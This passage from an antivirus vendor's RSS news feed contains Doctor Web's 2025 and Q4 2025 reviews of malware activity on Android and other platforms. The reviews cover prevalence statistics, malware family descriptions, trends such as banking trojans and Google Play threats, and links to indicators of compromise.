&lt;p&gt;Techniques involving manipulating the format of ZIP archives (APK files of Android apps are essentially ZIP archives) remain popular. These include manipulating the &lt;span class="string"&gt;compression method&lt;/span&gt; and &lt;span class="string"&gt;compressed size&lt;/span&gt; fields in the local file header structure inside the APK, and also using incorrect disk data in ECDR and CD records. We covered these techniques in more detail in our &lt;a href="https://news.drweb.com/show/review/?lng=en&amp;i=14970#troj" target="_blank"&gt;previous review&lt;/a&gt;, in the section dedicated to banking trojans. After such manipulations, trojan apps remain fully functional, but many static analysis tools perceive them as damaged and are unable to process them correctly.&lt;/p&gt;

&lt;p&gt;Malware creators have increased their use of dropper programs to conceal their main payload in order to, for example, bypass the internal protection on Google Play. Cybercriminals are also using AI assistants when writing banking trojan code, which simplifies the malware-development process and leads to the emergence of new families. Moreover, threat actors are increasingly using Telegram bots to control banking trojans and exfiltrate data from infected devices.&lt;/p&gt;

&lt;h3&gt;Prospects and trends&lt;/h3&gt;

&lt;p&gt;In 2025, we observed high activity on the part of ad-displaying trojans, which remain the most common threats targeting the Android OS. Various fake programs used for fraudulent purposes, including phishing and money theft, were also widespread again. In addition, the number of attacks involving banking trojans continued to increase. All of these malicious apps are a source of illegal income for cybercriminals, which is why their popularity remains high. In 2026, they are highly likely to once again be one of the most popular money-making tools for cybercriminals. Meanwhile, malware creators are increasingly using Telegram bots to control banking trojans. This trend is likely to continue.&lt;/p&gt;

&lt;p&gt;The emergence of &lt;a href="https://vms.drweb.com/search/?q=Android.Clipper.31&amp;lng=en"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; malware and new versions of the &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.Triada&amp;lng=en"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; trojans in the firmware of smartphones and TV box sets indicates the continued interest of attackers in distributing malware in ways that significantly complicate its detection. It is likely that this trend will continue in the new year and that we will see more cases of malicious programs being pre-installed on smartphones, TV box sets, and other types of Android devices.&lt;/p&gt;

&lt;p&gt;We should also expect that more sophisticated malicious apps, ones capable of performing a wider range of tasks, will emerge. These could be yet other backdoors and various spyware trojans. Moreover, malware creators will likely use official app catalogs, including Google Play, to distribute malware and unwanted software.&lt;/p&gt;

&lt;p&gt;Threat actors will also continue implementing various protection methods for the instruments they create. They will also use AI assistants more often when writing code, which will lead to the emergence of more new families.&lt;/p&gt;

&lt;p&gt;Doctor Web monitors the threat landscape in the mobile segment and promptly responds to emerging challenges. We recommend that Android users install Dr.Web Security Space for mobile devices to protect themselves from malicious and other dangerous programs.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/2025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15101&amp;lng=en</guid><title>Doctor Web’s Q4 2025 review of virus activity on mobile devices</title><link>https://news.drweb.com/show/?i=15101&amp;lng=en&amp;c=5</link><pubDate>Mon, 12 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;January 12, 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, the trojans &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, which display intrusive ads, were again the most widespread Android threats. At the same time, their activity decreased, and they were detected less frequently on protected devices by 43.24% and 18.06%, respectively. These malicious programs were followed by trojans from the &lt;b&gt;Android.Siggen&lt;/b&gt; family, which includes malware whose functionality varies. They were also detected less often—by 27.47%.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;At the same time, noticeable banking trojan activity was observed, with users encountering them 65.52% more frequently. This growth was largely due to members of the &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; family. Such malicious programs intercept SMS with one-time codes for confirming banking transactions and can also imitate the appearance of legitimate bank software and display phishing windows.&lt;/p&gt;

&lt;p&gt;Android apps modified with the CloudInject cloud service (Dr.Web anti-virus detects them as &lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;) were the most widespread unwanted software. CloudInject adds dangerous system permissions and obfuscated code to the apps, and the purpose of that code cannot be controlled. &lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt; (fake anti-viruses) and &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt; (fake money-making apps) were also commonly found on protected devices. The former detect non-existent threats and ask users to purchase the full version to “cure” the infection, while the latter allegedly allow users to make money by completing various tasks.&lt;/p&gt;

&lt;p&gt;The most widespread riskware programs in Q4 were &lt;b&gt;Tool.NPMod&lt;/b&gt; apps, programs modified using the NP Manager utility. This tool obfuscates the code of the modified apps and adds a special module to them that allows digital signature verification to be bypassed once applications are modified. Among the adware detections, members of the &lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt; family retained their lead. These are special software modules that developers integrate into apps to display notifications containing advertisements.&lt;/p&gt;

&lt;p&gt;In October, our specialists &lt;a href="https://news.drweb.com/show/?i=15076&amp;lng=en" target="_blank"&gt;informed&lt;/a&gt; users about the dangerous backdoor &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;. Threat actors embedded it into unofficial Telegram X messenger modifications and distributed it through malicious websites and third-party Android app catalogs. This malware steals logins and passwords for Telegram accounts as well as other confidential data. Moreover, with its help, threat actors can practically control the victim’s account and covertly perform various actions in the messenger on their behalf. For example, the attackers can join Telegram channels and leave them, conceal new authorized devices, conceal certain messages, etc. Malicious actors use several control mechanisms to operate &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;. One of them is the Redis database, which has not been seen previously in Android threats. In total, this backdoor infected around 58,000 devices, including about 3,000 different models of smartphones, tablets, TV box sets, and cars with on-board Android-based computers.&lt;/p&gt;

&lt;p&gt;Over the past quarter, Doctor Web’s anti-virus laboratory discovered new malware on Google Play. Among these programs were &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; trojans, which subscribe victims to paid services, and various &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; fake programs, which are used in fraudulent schemes. They had at least 263,000 downloads combined.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;PRINCIPAL TRENDS OF Q4 2025&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Ad-displaying trojans remain the most widespread Android threats&lt;/li&gt;
        &lt;li&gt;The number of banking trojan attacks increased&lt;/li&gt;
        &lt;li&gt;Malicious actors distributed the dangerous backdoor &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, which was built into Telegram X messenger modifications&lt;/li&gt;
        &lt;li&gt;More malicious programs emerged on Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;According to statistics collected by Dr.Web Security Space for mobile devices&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/01_malware_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/01_malware_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A trojan app that displays obnoxious ads. It is a special software module that developers incorporate into applications.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A trojan app that loads the website that is hardcoded into its settings. Known modifications of this malicious program load an online casino site.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Click&amp;lng=en"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for malicious &lt;em&gt;WhatsApp&lt;/em&gt; messenger mods that can covertly load various websites in the background.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Packed.57.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for an obfuscator that is used to protect apps, including malicious ones (for example, some &lt;b&gt;Android.SpyMax&lt;/b&gt; banking trojan versions).&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Triada&amp;lng=en"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5847&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for a packer for &lt;a href="https://vms.drweb.com/search/?q=Android.Triada&amp;lng=en"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; trojans that is designed to protect them from being detected and analyzed. Threat actors most often use the packer together with the malicious Telegram messenger mods in which these trojans are embedded.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/02_unwanted_q_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/02_unwanted_q_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for Android programs that have been modified using the CloudInject cloud service and the eponymous Android utility (the latter was added to the Dr.Web virus database as &lt;a href="https://vms.drweb.com/search/?q=Tool.CloudInject&amp;lng=en"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Such programs are modified on a remote server; meanwhile, the modders (users) who are interested in such modifications cannot control exactly what will be added to the apps. Moreover, these programs receive a number of dangerous system permissions. Once modification is complete, modders can remotely manage these apps—blocking them, displaying custom dialogs, tracking when other software is being installed or removed from a device, etc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for adware programs that imitate anti-virus software. These apps inform users of nonexistent threats, mislead them, and demand that they purchase the software’s full version.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for Android applications that allegedly allow users to earn money by completing different tasks. These apps make it look as if rewards are accruing for each one that is completed. At the same time, users are told that they have to accumulate a certain sum to withdraw their “earnings”. Typically, such apps have a list of popular payment systems and banks that supposedly could be used to withdraw the rewards. But even if users succeed in accumulating the needed amount, in reality they cannot get any real payments. This virus record is also used to detect other unwanted software based on the source code of such apps.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;An application designed to monitor the activity of Android device owners. It allows intruders to read SMS, collect call information, track device location, and record the surroundings.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/03_riskware_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/03_riskware_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for Android programs that have been modified using the NP Manager utility. A special module is embedded in such apps, and it allows them to bypass digital signature verification once they have been modified.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.LuckyPatcher&amp;lng=en"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A tool that allows apps installed on Android devices to be modified (i.e., by creating patches for them) in order to change the logic of their work or to bypass certain restrictions. For instance, users can apply it to disable root-access verification in banking software or to obtain unlimited resources in games. To add patches, this utility downloads specially prepared scripts from the Internet, which can be crafted and added to a shared database by any third party. The functionality of such scripts can prove to be malicious; thus, patches made with this tool can pose a potential threat.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Androlua&amp;lng=en"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for some potentially dangerous versions of a specialized framework for developing Android software based on the Lua scripting language. The main logic of Lua-based apps resides in corresponding scripts that are encrypted and decrypted by the interpreter upon execution. By default, this framework often requests access to a large number of system permissions in order to operate. As a result, the Lua scripts that it executes can potentially perform various malicious actions in accordance with the acquired permissions.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/04_adware_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/04_adware_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.AdPush&amp;lng=en"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Adware modules that can be built into Android apps. They display notifications containing ads that mislead users. For example, such notifications can look like messages from the operating system. In addition, these modules collect a variety of confidential data and are able to download other apps and initiate their installation.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Bastion.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for optimization programs that periodically create notifications with misleading messages about allegedly low storage and “system errors” in order to display ads during the “optimization”.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Airpush.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Adware modules that can be built into Android apps and display various ads. Depending on the modules’ version and modification, these can be notifications containing ads, pop-up windows or banners. Malicious actors often use these modules to distribute malware by offering their potential victims diverse software for installation. Moreover, such modules collect personal information and send it to a remote server.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Adware.ModAd&amp;lng=en"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for some modified versions (mods) of the &lt;em&gt;WhatsApp&lt;/em&gt; messenger, whose functions have been injected with a specific code. This code is responsible for loading target URLs by displaying web content (via the Android WebView component) when the messenger is in operation. Such web addresses perform redirects to advertised sites, including online casino, bookmaker, and adult sites.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Threats on Google Play&lt;/h3&gt;

&lt;p&gt;Over the course of Q4 2025, Doctor Web’s virus analysts detected over 20 &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; malicious programs on Google Play. These are designed to subscribe users to paid services. Threat actors camouflaged them as various software: messengers, system optimization tools, image-editing apps, and apps that allow users to watch movies.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/05_Android.Joker_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/05_Android.Joker_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Examples of &lt;b&gt;Android.Joker&lt;/b&gt; malicious apps that were detected. &lt;b&gt;Android.Joker.2496&lt;/b&gt; masqueraded as Useful Cleaner, a tool for clearing out “junk” from the phone, and one of the &lt;b&gt;Android.Joker.2495&lt;/b&gt; modifications was passed off as the movie player Reel Drama&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Our experts also discovered several new fake programs from the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; family. As before, some of them were distributed as financial apps and were designed to load fraudulent websites. Other fakes were passed off as games. Under certain conditions (for instance, if a user’s IP address met the attackers’ requirements), they could load bookmaker and online casino sites.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/06_Android.FakeApp.1910_1_Chicken_Road_Fun.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_mobile_q4/06_Android.FakeApp.1910_1_Chicken_Road_Fun.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;The Chicken Road Fun game was the fake app &lt;b&gt;Android.FakeApp.1910&lt;/b&gt;. It could open an online casino website instead of providing the declared functionality&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;To protect your Android device from malware and unwanted programs, we recommend installing Dr.Web anti-virus products for Android.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q4%202025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15099&amp;lng=en</guid><title>Doctor Web’s Q4 2025 virus activity review</title><link>https://news.drweb.com/show/?i=15099&amp;lng=en&amp;c=5</link><pubDate>Mon, 12 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;January 12 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;According to statistics collected by the Dr.Web anti-virus, the total number of threats detected in the fourth quarter of 2025 increased by 16.05%, compared to the third quarter. The number of unique threats decreased by 1.13%. Most common were unwanted adware apps, malicious scripts, and various malicious programs, including downloaders and ad-displaying trojans.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;In email traffic, trojan apps—like downloaders, password stealers, and droppers—were most frequently detected. Moreover, exploits, backdoors, and various malicious scripts were also distributed via email.&lt;/p&gt;

&lt;p&gt;Users whose files were affected by encoder trojans had mostly encountered &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.41868&lt;/b&gt;, and &lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.29750&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;In October, we &lt;a href="https://news.drweb.com/show/?i=15076&amp;lng=en" target="_blank"&gt;informed&lt;/a&gt; users about the &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; backdoor, which cybercriminals were distributing in modified versions of the Telegram X messenger. This malicious program steals logins and passwords for Telegram accounts as well as other sensitive data. Using this backdoor, threat actors can control the victims’ hacked accounts and also gain full control over the messenger itself, performing various actions on behalf of users.&lt;/p&gt;

&lt;p&gt;In November, our anti-virus laboratory released a &lt;a href="https://news.drweb.com/show/?i=15078&amp;lng=en" target="_blank"&gt;study&lt;/a&gt; of a targeted attack carried out by the Cavalry Werewolf hacker group on a Russian state institution. During the examination, Doctor Web’s experts identified many of the malicious instruments being used by the threat actors, including open-source tools that cybercriminals utilize in their campaigns. Our specialists also studied the features of this hacker group and the actions it typically takes in compromised networks.&lt;/p&gt;

&lt;p&gt;In December, we &lt;a href="https://news.drweb.com/show/?i=15090&amp;lng=en" target="_blank"&gt;published&lt;/a&gt; information about the unique trojan dubbed &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire&amp;lng=en"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;, which artificially increases the popularity of websites. To do so, it pretends to be a human so that its actions are not blocked by the anti-bot protection of the sites. The malicious program automatically searches for target websites in search engines, opens them, and performs clicks on their webpages in accordance with the parameters received from the malicious actors. &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire&amp;lng=en"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; infects computers with the help of several malicious programs that exploit DLL Search Order Hijacking class vulnerabilities and also utilize anti-debugging techniques to avoid detection.&lt;/p&gt;

&lt;p&gt;Over the course of Q4, Doctor Web’s Internet analysts identified new fraudulent websites that promised potential victims quick and easy money. More phishing sites and fake marketplace Internet resources were also found.&lt;/p&gt;

&lt;p&gt;Our specialists uncovered yet more malicious apps on Google Play. Among them were &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; trojans, which subscribe Android device owners to paid services, as well as &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; malicious apps, which cybercriminals use to implement various fraudulent schemes. At the same time, detection statistics from Dr.Web Security Space for mobile devices revealed that Android banking trojans increased their activity.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Principal trends in Q4 2025&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;The number of threats detected on protected devices increased&lt;/li&gt;
        &lt;li&gt;The number of unique threats used in attacks decreased&lt;/li&gt;
        &lt;li&gt;More users requested help to decrypt files affected by encoder trojans&lt;/li&gt;
        &lt;li&gt;Banking trojans targeting Android device owners were more active&lt;/li&gt;
        &lt;li&gt;Threat actors distributed the &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; backdoor, which hacks the Telegram accounts of Android users&lt;/li&gt;
        &lt;li&gt;New malicious apps emerged on Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;According to Doctor Web’s statistics service&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/01_stat_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/01_stat_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;The most common threats in Q4 2025:&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A trojan written in the Go programming language and designed to download various miner trojans and adware into infected systems. This malware is a DLL file located at &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. To launch, it exploits a DLL Search Order Hijacking vulnerability in the uTorrent torrent client.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Adware that often serves as an intermediary installer of pirated software.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.7&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A malicious script that, in an infinite loop, searches for windows containing the text &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt;, and &lt;span class="string"&gt;розробника&lt;/span&gt; and sends them an Escape key press event, forcibly closing them.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4268&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for a malicious component of the WinSafe browser extension. This component is a JavaScript file that displays intrusive ads in browsers.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Siggen.33379&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A fake Adblock Plus browser ad blocker that is installed on the system by other malware to display advertisements.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Statistics for malware discovered in email traffic&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/02_mail_traffic_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/02_mail_traffic_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;The most common threats in email traffic in Q4 2025:&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A family of downloader trojans that exploit vulnerabilities in Microsoft Office documents. They can also download other malicious programs to a compromised computer.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2017-11882.123&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Exploits designed to take advantage of Microsoft Office software vulnerabilities and allow an attacker to run arbitrary code.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1413&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;The detection name for a packed version of the &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.289&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; malicious app, written in the AutoIt scripting language. This trojan is distributed as part of a group of several malicious applications, including a miner, a backdoor, and a self-propagating module. &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.289&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; performs various malicious actions that make it difficult for the main payload to be detected.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.791&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;A malicious JavaScript script that generates a phishing web page.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Encryption ransomware&lt;/h3&gt;

&lt;p&gt;In Q4 2025, the number of requests made to decrypt files affected by encoder trojans increased by 1.15%, compared to Q3 2025.&lt;/p&gt;

&lt;p&gt;The dynamics of the decryption requests received by Doctor Web’s technical support service:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/03_encoder_requests_q4_2025_en.png" data-fancybox&gt;
